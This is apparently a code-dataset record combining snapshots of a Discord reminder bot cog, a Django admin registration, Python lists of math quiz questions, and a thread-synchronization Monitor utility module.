now:\n await ctx.send('That time is in the past.')\n else:\n display_name = get_name_string(ctx.message)\n if user_is_irc_bot(ctx):\n author_id = 1\n irc_n = display_name\n else:\n author_id = get_database_user(ctx.author).id\n irc_n = None\n trig_at = trigger_time\n trig = False\n playback_ch_id = ctx.message.channel.id\n new_reminder = Reminder(user_id=author_id, reminder_content=\n reminder_content, trigger_at=trig_at, triggered=trig,\n playback_channel_id=playback_ch_id, irc_name=irc_n)\n db_session.add(new_reminder)\n try:\n db_session.commit()\n await 
ctx.send(\n f\"Thanks {display_name}, I have saved your reminder (but please note that my granularity is set at {precisedelta(CONFIG.REMINDER_SEARCH_INTERVAL, minimum_unit='seconds')}).\"\n )\n except (ScalarListException, SQLAlchemyError) as e:\n db_session.rollback()\n logging.exception(e)\n await ctx.send(f'Something went wrong')\n\n\ndef setup(bot: Bot):\n bot.add_cog(Reminders(bot))\n",
"step-3": "<mask token>\nLONG_HELP_TEXT = \"\"\"\nAdd reminders for yourself or remove the last one you added.\n\"\"\"\nSHORT_HELP_TEXT = 'Add or remove reminders.'\n\n\nasync def reminder_check(bot):\n await bot.wait_until_ready()\n while not bot.is_closed():\n now = datetime.now()\n reminders = db_session.query(Reminder).filter(Reminder.trigger_at <=\n now, Reminder.triggered == False).all()\n for r in reminders:\n if r.irc_name:\n display_name = r.irc_name\n else:\n author_uid = r.user.user_uid\n display_name = f'<@{author_uid}>'\n channel = bot.get_channel(r.playback_channel_id)\n message = f'Reminding {display_name}: ' + r.reminder_content\n await channel.send(message)\n r.triggered = True\n db_session.commit()\n await asyncio.sleep(CONFIG.REMINDER_SEARCH_INTERVAL)\n\n\nclass Reminders(commands.Cog):\n\n def __init__(self, bot: Bot):\n self.bot = bot\n self.bot.loop.create_task(reminder_check(self.bot))\n\n @commands.group(help=LONG_HELP_TEXT, brief=SHORT_HELP_TEXT)\n async def reminder(self, ctx: Context):\n if not ctx.invoked_subcommand:\n await ctx.send('Subcommand not found.')\n\n @reminder.command(help=\n 'Add a reminder, format \"yyyy-mm-dd hh:mm\" or \"mm-dd hh:mm\" or hh:mm:ss or hh:mm or xdxhxmxs or any ordered combination of the last format, then finally your reminder (rest of discord message).'\n )\n async def add(self, ctx: Context, trigger_time: DateTimeConverter, *,\n reminder_content: str):\n now = datetime.now()\n if not trigger_time:\n await ctx.send('Incorrect time format, please see help text.')\n elif trigger_time < now:\n await ctx.send('That time is in the past.')\n else:\n display_name = get_name_string(ctx.message)\n if user_is_irc_bot(ctx):\n author_id = 1\n irc_n = display_name\n else:\n author_id = get_database_user(ctx.author).id\n irc_n = None\n trig_at = trigger_time\n trig = False\n playback_ch_id = ctx.message.channel.id\n new_reminder = Reminder(user_id=author_id, reminder_content=\n reminder_content, trigger_at=trig_at, 
triggered=trig,\n playback_channel_id=playback_ch_id, irc_name=irc_n)\n db_session.add(new_reminder)\n try:\n db_session.commit()\n await ctx.send(\n f\"Thanks {display_name}, I have saved your reminder (but please note that my granularity is set at {precisedelta(CONFIG.REMINDER_SEARCH_INTERVAL, minimum_unit='seconds')}).\"\n )\n except (ScalarListException, SQLAlchemyError) as e:\n db_session.rollback()\n logging.exception(e)\n await ctx.send(f'Something went wrong')\n\n\ndef setup(bot: Bot):\n bot.add_cog(Reminders(bot))\n",
"step-4": "import asyncio\nimport logging\nfrom datetime import datetime\nfrom discord.ext import commands\nfrom discord.ext.commands import Bot, Context\nfrom humanize import precisedelta\nfrom sqlalchemy.exc import SQLAlchemyError\nfrom sqlalchemy_utils import ScalarListException\nfrom config import CONFIG\nfrom models import Reminder, db_session\nfrom utils import DateTimeConverter, get_database_user, get_database_user_from_id, get_name_string, user_is_irc_bot\nLONG_HELP_TEXT = \"\"\"\nAdd reminders for yourself or remove the last one you added.\n\"\"\"\nSHORT_HELP_TEXT = 'Add or remove reminders.'\n\n\nasync def reminder_check(bot):\n await bot.wait_until_ready()\n while not bot.is_closed():\n now = datetime.now()\n reminders = db_session.query(Reminder).filter(Reminder.trigger_at <=\n now, Reminder.triggered == False).all()\n for r in reminders:\n if r.irc_name:\n display_name = r.irc_name\n else:\n author_uid = r.user.user_uid\n display_name = f'<@{author_uid}>'\n channel = bot.get_channel(r.playback_channel_id)\n message = f'Reminding {display_name}: ' + r.reminder_content\n await channel.send(message)\n r.triggered = True\n db_session.commit()\n await asyncio.sleep(CONFIG.REMINDER_SEARCH_INTERVAL)\n\n\nclass Reminders(commands.Cog):\n\n def __init__(self, bot: Bot):\n self.bot = bot\n self.bot.loop.create_task(reminder_check(self.bot))\n\n @commands.group(help=LONG_HELP_TEXT, brief=SHORT_HELP_TEXT)\n async def reminder(self, ctx: Context):\n if not ctx.invoked_subcommand:\n await ctx.send('Subcommand not found.')\n\n @reminder.command(help=\n 'Add a reminder, format \"yyyy-mm-dd hh:mm\" or \"mm-dd hh:mm\" or hh:mm:ss or hh:mm or xdxhxmxs or any ordered combination of the last format, then finally your reminder (rest of discord message).'\n )\n async def add(self, ctx: Context, trigger_time: DateTimeConverter, *,\n reminder_content: str):\n now = datetime.now()\n if not trigger_time:\n await ctx.send('Incorrect time format, please see help text.')\n elif 
trigger_time < now:\n await ctx.send('That time is in the past.')\n else:\n display_name = get_name_string(ctx.message)\n if user_is_irc_bot(ctx):\n author_id = 1\n irc_n = display_name\n else:\n author_id = get_database_user(ctx.author).id\n irc_n = None\n trig_at = trigger_time\n trig = False\n playback_ch_id = ctx.message.channel.id\n new_reminder = Reminder(user_id=author_id, reminder_content=\n reminder_content, trigger_at=trig_at, triggered=trig,\n playback_channel_id=playback_ch_id, irc_name=irc_n)\n db_session.add(new_reminder)\n try:\n db_session.commit()\n await ctx.send(\n f\"Thanks {display_name}, I have saved your reminder (but please note that my granularity is set at {precisedelta(CONFIG.REMINDER_SEARCH_INTERVAL, minimum_unit='seconds')}).\"\n )\n except (ScalarListException, SQLAlchemyError) as e:\n db_session.rollback()\n logging.exception(e)\n await ctx.send(f'Something went wrong')\n\n\ndef setup(bot: Bot):\n bot.add_cog(Reminders(bot))\n",
"step-5": "import asyncio\nimport logging\nfrom datetime import datetime\n\nfrom discord.ext import commands\nfrom discord.ext.commands import Bot, Context\nfrom humanize import precisedelta\nfrom sqlalchemy.exc import SQLAlchemyError\nfrom sqlalchemy_utils import ScalarListException\n\nfrom config import CONFIG\nfrom models import Reminder, db_session\nfrom utils import (\n DateTimeConverter,\n get_database_user,\n get_database_user_from_id,\n get_name_string,\n user_is_irc_bot,\n)\n\nLONG_HELP_TEXT = \"\"\"\nAdd reminders for yourself or remove the last one you added.\n\"\"\"\nSHORT_HELP_TEXT = \"\"\"Add or remove reminders.\"\"\"\n\n\nasync def reminder_check(bot):\n await bot.wait_until_ready()\n while not bot.is_closed():\n now = datetime.now()\n reminders = (\n db_session.query(Reminder)\n .filter(Reminder.trigger_at <= now, Reminder.triggered == False) # noqa 712\n .all()\n )\n for r in reminders:\n if r.irc_name:\n display_name = r.irc_name\n else:\n author_uid = r.user.user_uid\n display_name = f\"<@{author_uid}>\"\n channel = bot.get_channel(r.playback_channel_id)\n message = f\"Reminding {display_name}: \" + r.reminder_content\n await channel.send(message)\n r.triggered = True\n db_session.commit()\n\n await asyncio.sleep(CONFIG.REMINDER_SEARCH_INTERVAL)\n\n\nclass Reminders(commands.Cog):\n def __init__(self, bot: Bot):\n self.bot = bot\n self.bot.loop.create_task(reminder_check(self.bot))\n\n @commands.group(help=LONG_HELP_TEXT, brief=SHORT_HELP_TEXT)\n async def reminder(self, ctx: Context):\n if not ctx.invoked_subcommand:\n await ctx.send(\"Subcommand not found.\")\n\n @reminder.command(\n help='Add a reminder, format \"yyyy-mm-dd hh:mm\" or \"mm-dd hh:mm\" or hh:mm:ss or hh:mm or xdxhxmxs or any ordered combination of the last format, then finally your reminder (rest of discord message).'\n )\n async def add(\n self, ctx: Context, trigger_time: DateTimeConverter, *, reminder_content: str\n ):\n now = datetime.now()\n if not trigger_time:\n await 
ctx.send(\"Incorrect time format, please see help text.\")\n elif trigger_time < now:\n await ctx.send(\"That time is in the past.\")\n else:\n # HURRAY the time is valid and not in the past, add the reminder\n display_name = get_name_string(ctx.message)\n\n # set the id to a random value if the author was the bridge bot, since we wont be using it anyways\n # if ctx.message.clean_content.startswith(\"**<\"): <---- FOR TESTING\n if user_is_irc_bot(ctx):\n author_id = 1\n irc_n = display_name\n else:\n author_id = get_database_user(ctx.author).id\n irc_n = None\n\n trig_at = trigger_time\n trig = False\n playback_ch_id = ctx.message.channel.id\n new_reminder = Reminder(\n user_id=author_id,\n reminder_content=reminder_content,\n trigger_at=trig_at,\n triggered=trig,\n playback_channel_id=playback_ch_id,\n irc_name=irc_n,\n )\n db_session.add(new_reminder)\n try:\n db_session.commit()\n await ctx.send(\n f\"Thanks {display_name}, I have saved your reminder (but please note that my granularity is set at {precisedelta(CONFIG.REMINDER_SEARCH_INTERVAL, minimum_unit='seconds')}).\"\n )\n except (ScalarListException, SQLAlchemyError) as e:\n db_session.rollback()\n logging.exception(e)\n await ctx.send(f\"Something went wrong\")\n\n\ndef setup(bot: Bot):\n bot.add_cog(Reminders(bot))\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
# Expose the Evaluacion model through Django's built-in admin interface.
from django.contrib import admin
from Evaluacion.models import Evaluacion
admin.site.register(Evaluacion)
|
normal
|
{
"blob_id": "4ef4e302304ccf2dc92cdebe134e104af47aae20",
"index": 3795,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nadmin.site.register(Evaluacion)\n",
"step-3": "from django.contrib import admin\nfrom Evaluacion.models import Evaluacion\nadmin.site.register(Evaluacion)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
# Question banks: each entry is [question_text, integer_answer].
# Some question strings embed U+200B (zero-width space) characters around
# the root symbols — preserve them when editing.
# Easy: basic arithmetic, factorials, simple roots and linear systems.
Easy = [['4 + 12 = ?', 16], ['45 -34 = ?', 11], ['27 + 12 -18 = ?', 21], [
    '25 - 5 * 4 = ?', 5], ['18 + 45 / 5 - 3 * 2 = ?', 21], ['5! = ?', 120],
    ['3! + 2! = ?', 8], ['7 + 5! / 4! - 6 / 3 = ?', 10], [
    '(25 + 5) / 6 * 4 = ?', 20], ['4(3+c)+c=c+4; c=?', -2], [
    '\u200b√\u200b121 = ?', 11], ['x = √\u200b81 - √\u200b64; x= ?', 1], [
    'x + y = 20; x - y = 4; y = ?', 8]]
# Normal: linear equations, roots and basic combinatorics.
Normal = [['8(10−k)=2k; k = ?', 8], ['−4n−8=4(−3n+2); n=?', 2], [
    '4(3+c)+c=c+4; c=?', -2], ['\u200b√\u200b121 = ?', 11], [
    'x = √\u200b81 - √\u200b64; x= ?', 1], [
    'y = √\u200b16 * √\u200b4 / √\u200b9; y=?', 2], [
    'y−3=2(x+1); x= -2, y=?', 1], [' y*y = 4x/5 − 11; y= 5, x = ?', 45], [
    'How many unique ways are there to arrange the letters in the word CANNON?'
    , 120], [
    'How many numbers between 1 and 100(inclusive) are divisible by 10 or 7',
    23], ['y=−4x+6; \u200b3x+4y=-2 ; x=?', 2], [
    '−x+4y=−9; \u200by=−2x-9; y=?', -3]]
# Hard: word-problem combinatorics plus harder repeats of Normal questions.
# NOTE(review): several stored answers look wrong — C(999, 5) is not 126
# (126 = C(9, 5)), and 'y−3=2(x+1); x= -2' gives y = 1, not 48 (it appears
# with answer 1 further down). Verify against the original quiz source.
Hard = [[
    'Emily is packing her bags for her vacation. She has 6 unique Fabergé eggs, but only 3 fit in her bag. How many different groups of 3 Fabergé eggs can she take?'
    , 20], [
    'You just got a free ticket for a boat ride, and you can bring along 2 friends! Unfortunately, you have 5 friends who want to come along. How many different groups of friends could you take with you?'
    , 10], [
    'Omar is packing his bags for his vacation. He has 999 unique shirts, but only 5 fit in his bag. How many different groups of 5 shirts can he take?'
    , 126], [
    'How many numbers between 1 and 100(inclusive) are divisible by 3 or 2?',
    67], [
    "You need to put your reindeer, Gloopin, Quentin, Ezekiel, and Lancer, in a single-file line to pull your sleigh. However, Quentin and Gloopin are best friends, so you have to put them next to each other, or they won't fly. How many ways can you arrange your reindeer?"
    , 12], [
    "You need to put your reindeer, Gloopin, Balthazar, Bloopin, Prancer, and Quentin, in a single-file line to pull your sleigh. However, Prancer and Balthazar are best friends, so you have to put them next to each other, or they won't fly. How many ways can you arrange your reindeer?"
    , 2], ['y−3=2(x+1); x= -2, y=?', 48], [
    'How many unique ways are there to arrange the letters in the word CANNON?'
    , 120], [
    'How many numbers between 1 and 100(inclusive) are divisible by 10 or 7',
    23], ['−x+4y=−9; \u200by=−2x-9; y=?', -3], [
    'x = √\u200b81 - √\u200b64; x= ?', 1], [
    'y = √\u200b16 * √\u200b4 / √\u200b9; y=?', 2], [
    'y−3=2(x+1); x= -2, y=?', 1], [' y*y = 4x/5 − 11; y= 5, x = ?', 45], [
    'y=−4x+6; \u200b3x+4y=-2 ; x=?', 2], ['−x+4y=−9; \u200by=−2x-9; y=?', -3]]
<|reserved_special_token_1|>
# Question banks: each entry is [question_text, integer_answer].
# NOTE(review): the question strings may contain invisible zero-width
# space (U+200B) characters around root symbols — confirm before editing.
# Easy: basic arithmetic, factorials, simple roots and linear systems.
Easy = [["4 + 12 = ?", 16],
        ["45 -34 = ?", 11],
        ["27 + 12 -18 = ?", 21],
        ['25 - 5 * 4 = ?', 5],
        ["18 + 45 / 5 - 3 * 2 = ?", 21],
        ["5! = ?", 120],
        ["3! + 2! = ?", 8],
        ["7 + 5! / 4! - 6 / 3 = ?", 10],
        ["(25 + 5) / 6 * 4 = ?", 20],
        ["4(3+c)+c=c+4; c=?", -2],
        ["√121 = ?" ,11],
        ["x = √81 - √64; x= ?", 1],
        ["x + y = 20; x - y = 4; y = ?", 8]]

# Normal: linear equations, roots and basic combinatorics.
Normal = [["8(10−k)=2k; k = ?", 8],
          ["−4n−8=4(−3n+2); n=?", 2],
          ["4(3+c)+c=c+4; c=?", -2],
          ["√121 = ?" ,11],
          ["x = √81 - √64; x= ?", 1],
          ["y = √16 * √4 / √9; y=?", 2],
          ["y−3=2(x+1); x= -2, y=?", 1],
          [" y*y = 4x/5 − 11; y= 5, x = ?", 45],
          ["How many unique ways are there to arrange the letters in the word CANNON?", 120],
          ["How many numbers between 1 and 100(inclusive) are divisible by 10 or 7", 23],
          ["y=−4x+6; 3x+4y=-2 ; x=?", 2],
          ["−x+4y=−9; y=−2x-9; y=?", -3]]

# Hard: word-problem combinatorics plus harder repeats of Normal questions.
# NOTE(review): several stored answers look wrong — C(999, 5) is not 126
# (126 = C(9, 5)), and 'y−3=2(x+1); x= -2' gives y = 1, not 48 (it appears
# with answer 1 further down). Verify against the original quiz source.
Hard = [["Emily is packing her bags for her vacation. She has 6 unique Fabergé eggs, but only 3 fit in her bag. How many different groups of 3 Fabergé eggs can she take?", 20],
        ["You just got a free ticket for a boat ride, and you can bring along 2 friends! Unfortunately, you have 5 friends who want to come along. How many different groups of friends could you take with you?", 10],
        ["Omar is packing his bags for his vacation. He has 999 unique shirts, but only 5 fit in his bag. How many different groups of 5 shirts can he take?", 126],
        ["How many numbers between 1 and 100(inclusive) are divisible by 3 or 2?" ,67],
        ["You need to put your reindeer, Gloopin, Quentin, Ezekiel, and Lancer, in a single-file line to pull your sleigh. However, Quentin and Gloopin are best friends, so you have to put them next to each other, or they won't fly. How many ways can you arrange your reindeer?", 12],
        ["You need to put your reindeer, Gloopin, Balthazar, Bloopin, Prancer, and Quentin, in a single-file line to pull your sleigh. However, Prancer and Balthazar are best friends, so you have to put them next to each other, or they won't fly. How many ways can you arrange your reindeer?", 2],
        ["y−3=2(x+1); x= -2, y=?", 48],
        ["How many unique ways are there to arrange the letters in the word CANNON?", 120],
        ["How many numbers between 1 and 100(inclusive) are divisible by 10 or 7", 23],
        ["−x+4y=−9; y=−2x-9; y=?", -3],
        ["x = √81 - √64; x= ?", 1],
        ["y = √16 * √4 / √9; y=?", 2],
        ["y−3=2(x+1); x= -2, y=?", 1],
        [" y*y = 4x/5 − 11; y= 5, x = ?", 45],
        ["y=−4x+6; 3x+4y=-2 ; x=?", 2],
        ["−x+4y=−9; y=−2x-9; y=?", -3]]
|
flexible
|
{
"blob_id": "66edf0d2f7e25e166563bdb1063a1ed45ecda0e6",
"index": 541,
"step-1": "<mask token>\n",
"step-2": "Easy = [['4 + 12 = ?', 16], ['45 -34 = ?', 11], ['27 + 12 -18 = ?', 21], [\n '25 - 5 * 4 = ?', 5], ['18 + 45 / 5 - 3 * 2 = ?', 21], ['5! = ?', 120],\n ['3! + 2! = ?', 8], ['7 + 5! / 4! - 6 / 3 = ?', 10], [\n '(25 + 5) / 6 * 4 = ?', 20], ['4(3+c)+c=c+4; c=?', -2], [\n '\\u200b√\\u200b121 = ?', 11], ['x = √\\u200b81 - √\\u200b64; x= ?', 1], [\n 'x + y = 20; x - y = 4; y = ?', 8]]\nNormal = [['8(10−k)=2k; k = ?', 8], ['−4n−8=4(−3n+2); n=?', 2], [\n '4(3+c)+c=c+4; c=?', -2], ['\\u200b√\\u200b121 = ?', 11], [\n 'x = √\\u200b81 - √\\u200b64; x= ?', 1], [\n 'y = √\\u200b16 * √\\u200b4 / √\\u200b9; y=?', 2], [\n 'y−3=2(x+1); x= -2, y=?', 1], [' y*y = 4x/5 − 11; y= 5, x = ?', 45], [\n 'How many unique ways are there to arrange the letters in the word CANNON?'\n , 120], [\n 'How many numbers between 1 and 100(inclusive) are divisible by 10 or 7',\n 23], ['y=−4x+6; \\u200b3x+4y=-2 ; x=?', 2], [\n '−x+4y=−9; \\u200by=−2x-9; y=?', -3]]\nHard = [[\n 'Emily is packing her bags for her vacation. She has 6 unique Fabergé eggs, but only 3 fit in her bag. How many different groups of 3 Fabergé eggs can she take?'\n , 20], [\n 'You just got a free ticket for a boat ride, and you can bring along 2 friends! Unfortunately, you have 5 friends who want to come along. How many different groups of friends could you take with you?'\n , 10], [\n 'Omar is packing his bags for his vacation. He has 999 unique shirts, but only 5 fit in his bag. How many different groups of 5 shirts can he take?'\n , 126], [\n 'How many numbers between 1 and 100(inclusive) are divisible by 3 or 2?',\n 67], [\n \"You need to put your reindeer, Gloopin, Quentin, Ezekiel, and Lancer, in a single-file line to pull your sleigh. However, Quentin and Gloopin are best friends, so you have to put them next to each other, or they won't fly. 
How many ways can you arrange your reindeer?\"\n , 12], [\n \"You need to put your reindeer, Gloopin, Balthazar, Bloopin, Prancer, and Quentin, in a single-file line to pull your sleigh. However, Prancer and Balthazar are best friends, so you have to put them next to each other, or they won't fly. How many ways can you arrange your reindeer?\"\n , 2], ['y−3=2(x+1); x= -2, y=?', 48], [\n 'How many unique ways are there to arrange the letters in the word CANNON?'\n , 120], [\n 'How many numbers between 1 and 100(inclusive) are divisible by 10 or 7',\n 23], ['−x+4y=−9; \\u200by=−2x-9; y=?', -3], [\n 'x = √\\u200b81 - √\\u200b64; x= ?', 1], [\n 'y = √\\u200b16 * √\\u200b4 / √\\u200b9; y=?', 2], [\n 'y−3=2(x+1); x= -2, y=?', 1], [' y*y = 4x/5 − 11; y= 5, x = ?', 45], [\n 'y=−4x+6; \\u200b3x+4y=-2 ; x=?', 2], ['−x+4y=−9; \\u200by=−2x-9; y=?', -3]]\n",
"step-3": "Easy = [[\"4 + 12 = ?\", 16],\r\n [\"45 -34 = ?\", 11],\r\n [\"27 + 12 -18 = ?\", 21],\r\n ['25 - 5 * 4 = ?', 5],\r\n [\"18 + 45 / 5 - 3 * 2 = ?\", 21],\r\n [\"5! = ?\", 120],\r\n [\"3! + 2! = ?\", 8],\r\n [\"7 + 5! / 4! - 6 / 3 = ?\", 10],\r\n [\"(25 + 5) / 6 * 4 = ?\", 20],\r\n [\"4(3+c)+c=c+4; c=?\", -2],\r\n [\"√121 = ?\" ,11],\r\n [\"x = √81 - √64; x= ?\", 1],\r\n [\"x + y = 20; x - y = 4; y = ?\", 8]]\r\n\r\nNormal = [[\"8(10−k)=2k; k = ?\", 8],\r\n [\"−4n−8=4(−3n+2); n=?\", 2],\r\n [\"4(3+c)+c=c+4; c=?\", -2],\r\n [\"√121 = ?\" ,11],\r\n [\"x = √81 - √64; x= ?\", 1],\r\n [\"y = √16 * √4 / √9; y=?\", 2],\r\n [\"y−3=2(x+1); x= -2, y=?\", 1],\r\n [\" y*y = 4x/5 − 11; y= 5, x = ?\", 45],\r\n [\"How many unique ways are there to arrange the letters in the word CANNON?\", 120],\r\n [\"How many numbers between 1 and 100(inclusive) are divisible by 10 or 7\", 23],\r\n [\"y=−4x+6; 3x+4y=-2 ; x=?\", 2],\r\n [\"−x+4y=−9; y=−2x-9; y=?\", -3]]\r\n\r\nHard = [[\"Emily is packing her bags for her vacation. She has 6 unique Fabergé eggs, but only 3 fit in her bag. How many different groups of 3 Fabergé eggs can she take?\", 20],\r\n [\"You just got a free ticket for a boat ride, and you can bring along 2 friends! Unfortunately, you have 5 friends who want to come along. How many different groups of friends could you take with you?\", 10],\r\n [\"Omar is packing his bags for his vacation. He has 999 unique shirts, but only 5 fit in his bag. How many different groups of 5 shirts can he take?\", 126],\r\n [\"How many numbers between 1 and 100(inclusive) are divisible by 3 or 2?\" ,67],\r\n [\"You need to put your reindeer, Gloopin, Quentin, Ezekiel, and Lancer, in a single-file line to pull your sleigh. However, Quentin and Gloopin are best friends, so you have to put them next to each other, or they won't fly. 
How many ways can you arrange your reindeer?\", 12],\r\n [\"You need to put your reindeer, Gloopin, Balthazar, Bloopin, Prancer, and Quentin, in a single-file line to pull your sleigh. However, Prancer and Balthazar are best friends, so you have to put them next to each other, or they won't fly. How many ways can you arrange your reindeer?\", 2],\r\n [\"y−3=2(x+1); x= -2, y=?\", 48],\r\n [\"How many unique ways are there to arrange the letters in the word CANNON?\", 120],\r\n [\"How many numbers between 1 and 100(inclusive) are divisible by 10 or 7\", 23],\r\n [\"−x+4y=−9; y=−2x-9; y=?\", -3],\r\n [\"x = √81 - √64; x= ?\", 1],\r\n [\"y = √16 * √4 / √9; y=?\", 2],\r\n [\"y−3=2(x+1); x= -2, y=?\", 1],\r\n [\" y*y = 4x/5 − 11; y= 5, x = ?\", 45],\r\n [\"y=−4x+6; 3x+4y=-2 ; x=?\", 2],\r\n [\"−x+4y=−9; y=−2x-9; y=?\", -3]]\r\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import collections
import copy
import threading
import typing as tp
from ..decorators.decorators import wraps
from ..typing import K, V, T
class Monitor:
    """
    Base utility class for building monitors (mutual-exclusion wrappers).

    A monitor guards its instance with a single NON-reentrant lock.
    Typical usage:

    >>> class MyProtectedObject(Monitor):
    >>>     def __init__(self, *args, **kwargs):
    >>>         Monitor.__init__(self)
    >>>         ... do your job ..

    >>>     @Monitor.synchronized
    >>>     def function_that_needs_mutual_exclusion(self):
    >>>         .. do your threadsafe jobs ..

    >>>     def function_that_partially_needs_protection(self):
    >>>         .. do your jobs ..
    >>>         with Monitor.acquire(self):
    >>>             .. do your threadsafe jobs ..
    >>>         .. do your jobs ..
    >>>         with self:
    >>>             .. do your threadsafe jobs ..
    """

    def __init__(self):
        """Call this from your constructor to install the monitor lock.

        The lock can also be taken/released on behalf of other objects."""
        self._monitor_lock = threading.Lock()  # type: threading.Lock

    def __enter__(self) -> 'Monitor':
        self._monitor_lock.acquire()
        return self

    def __exit__(self, exc_type, exc_val, exc_tb) -> bool:
        self._monitor_lock.release()
        return False    # never swallow exceptions

    @staticmethod
    def synchronize_on_attribute(attr_name: str):
        """
        Protect a method by acquiring a Monitor stored as an attribute of
        the method's owner.  The decorated method's first parameter must
        be ``self``.

        :param attr_name: name of the attribute holding the monitor
        """
        def decorator(fun):
            @wraps(fun)
            def guarded(self, *args, **kwargs):
                target = getattr(self, attr_name)
                # noinspection PyProtectedMember
                with target._monitor_lock:
                    return fun(self, *args, **kwargs)
            return guarded
        return decorator

    @staticmethod
    def synchronized(fun: tp.Callable) -> tp.Callable:
        """
        Decorator: the wrapped method takes the instance's global lock for
        the duration of the call, making it threadsafe.  Throughput depends
        on the class's access pattern and data semantics.
        """
        @wraps(fun)
        def locked_call(*args, **kwargs):
            instance = args[0]
            # noinspection PyProtectedMember
            with instance._monitor_lock:
                return fun(*args, **kwargs)
        return locked_call

    class release:
        """
        Context manager that temporarily RELEASES another monitor, useful
        when a protected section contains work that does not need mutual
        exclusion and could run in parallel:

        >>> @Monitor.synchronized
        >>> def protected_function(self):
        >>>     .. do some stuff that needs mutual exclusion ..
        >>>     with Monitor.release(self):
        >>>         .. do some I/O that does not need mutual exclusion ..
        >>>     .. back to protected stuff ..
        """
        __slots__ = ('foo',)

        def __init__(self, foo: 'Monitor'):
            self.foo = foo

        def __enter__(self) -> None:
            # noinspection PyProtectedMember
            self.foo._monitor_lock.release()

        def __exit__(self, e1, e2, e3) -> bool:
            # Re-take the lock on the way out so the caller's critical
            # section resumes protected.
            # noinspection PyProtectedMember
            self.foo._monitor_lock.acquire()
            return False

    class acquire:
        """
        Context manager that LOCKS another monitor from the outside:

        >>> with Monitor.acquire(foo):
        >>>     .. do operations on foo that need mutual exclusion ..
        """
        __slots__ = ('foo',)

        def __init__(self, foo: 'Monitor'):
            self.foo = foo

        def __enter__(self) -> None:
            # noinspection PyProtectedMember
            self.foo._monitor_lock.acquire()

        def __exit__(self, e1, e2, e3) -> bool:
            # noinspection PyProtectedMember
            self.foo._monitor_lock.release()
            return False

    @classmethod
    def synchronize_on(cls, monitor: 'Monitor') -> tp.Callable[[tp.Callable], tp.Callable]:
        """
        Decorator factory for locking on a Monitor other than ``self``:

        >>> class MasterClass(Monitor):
        >>>     def get_object(self):
        >>>         class SlaveClass:
        >>>             @Monitor.synchronize_on(self)
        >>>             def get_object(self2):
        >>>                 ...
        >>>         return SlaveClass
        """
        def decorator(fun):
            @wraps(fun)
            def locked(*args, **kwargs):
                with cls.acquire(monitor):
                    return fun(*args, **kwargs)
            return locked
        return decorator
class RMonitor(Monitor):
    """
    Re-entrant variant of :class:`Monitor`: the owning thread may take the
    lock recursively.
    """

    def __init__(self):
        # Install an RLock instead of the plain Lock Monitor would use.
        self._monitor_lock = threading.RLock()  # type: threading.RLock
class MonitorList(tp.Generic[T], collections.UserList, Monitor):
    """
    A list that doubles as a :class:`Monitor`.

    Access is *not* synchronized automatically — take the monitor yourself
    (opportunistic locking) whenever mutual exclusion is required.
    """

    def __init__(self, *args):
        collections.UserList.__init__(self, *args)
        Monitor.__init__(self)

    # element access: plain delegation to the backing list ---------------
    def __getitem__(self, item: tp.Union[slice, int]) -> T:
        return self.data[item]

    def __setitem__(self, key: int, value: T) -> None:
        self.data[key] = value

    def __delitem__(self, key: tp.Union[slice, int]) -> None:
        del self.data[key]

    # copying -------------------------------------------------------------
    def __copy__(self) -> 'MonitorList':
        return MonitorList(copy.copy(self.data))

    def __deepcopy__(self, memo) -> 'MonitorList':
        return MonitorList(copy.deepcopy(self.data, memo=memo))
class MonitorDict(tp.Generic[K, V], collections.UserDict, Monitor):
    """
    A dict that doubles as a :class:`Monitor`.

    Access is *not* synchronized automatically — take the monitor yourself
    (opportunistic locking) whenever mutual exclusion is required.
    """

    def __init__(self, *args, **kwargs):
        collections.UserDict.__init__(self, *args, **kwargs)
        Monitor.__init__(self)

    # copying -------------------------------------------------------------
    def __copy__(self) -> 'MonitorDict':
        return MonitorDict(copy.copy(self.data))

    def __deepcopy__(self, memo) -> 'MonitorDict':
        return MonitorDict(copy.deepcopy(self.data, memo=memo))

    # item access: plain delegation to the backing dict -------------------
    def __getitem__(self, item: K) -> V:
        return self.data[item]

    def __setitem__(self, key: K, value: V) -> None:
        self.data[key] = value

    def __delitem__(self, key: K) -> None:
        del self.data[key]
class MonitorSet(set, Monitor):
    """
    A set offering an atomic insert-if-absent operation.
    """

    def __init__(self, *args):
        super().__init__(*args)
        Monitor.__init__(self)

    def insert_and_check(self, item) -> bool:
        """
        Atomically insert ``item`` unless it is already present.

        :param item: item to insert
        :return: whether the item was successfully inserted
        """
        with Monitor.acquire(self):
            was_absent = item not in self
            if was_absent:
                self.add(item)
            return was_absent
|
normal
|
{
"blob_id": "0528d7761cbbf3dbe881ff05b81060f3d97e7f6c",
"index": 742,
"step-1": "<mask token>\n\n\nclass MonitorList(tp.Generic[T], collections.UserList, Monitor):\n <mask token>\n\n def __init__(self, *args):\n collections.UserList.__init__(self, *args)\n Monitor.__init__(self)\n <mask token>\n <mask token>\n\n def __getitem__(self, item: tp.Union[slice, int]) ->T:\n return self.data[item]\n\n def __setitem__(self, key: int, value: T) ->None:\n self.data[key] = value\n\n def __delitem__(self, key: tp.Union[slice, int]) ->None:\n del self.data[key]\n\n\nclass MonitorDict(tp.Generic[K, V], collections.UserDict, Monitor):\n \"\"\"\n A dict that is also a monitor.\n\n Note that access to it's properties is not automatically synchronized, you got to\n invoke the monitor to implement an opportunistic locking of your own choice\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n collections.UserDict.__init__(self, *args, **kwargs)\n Monitor.__init__(self)\n\n def __getitem__(self, item: K) ->V:\n return self.data[item]\n\n def __setitem__(self, key: K, value: V) ->None:\n self.data[key] = value\n\n def __delitem__(self, key: K) ->None:\n del self.data[key]\n\n def __copy__(self) ->'MonitorDict':\n return MonitorDict(copy.copy(self.data))\n\n def __deepcopy__(self, memo) ->'MonitorDict':\n return MonitorDict(copy.deepcopy(self.data, memo=memo))\n\n\nclass MonitorSet(set, Monitor):\n \"\"\"\n A set that allows atomic insert-if-not-already-there operation\n \"\"\"\n\n def __init__(self, *args):\n super().__init__(*args)\n Monitor.__init__(self)\n\n def insert_and_check(self, item) ->bool:\n \"\"\"\n Perform an 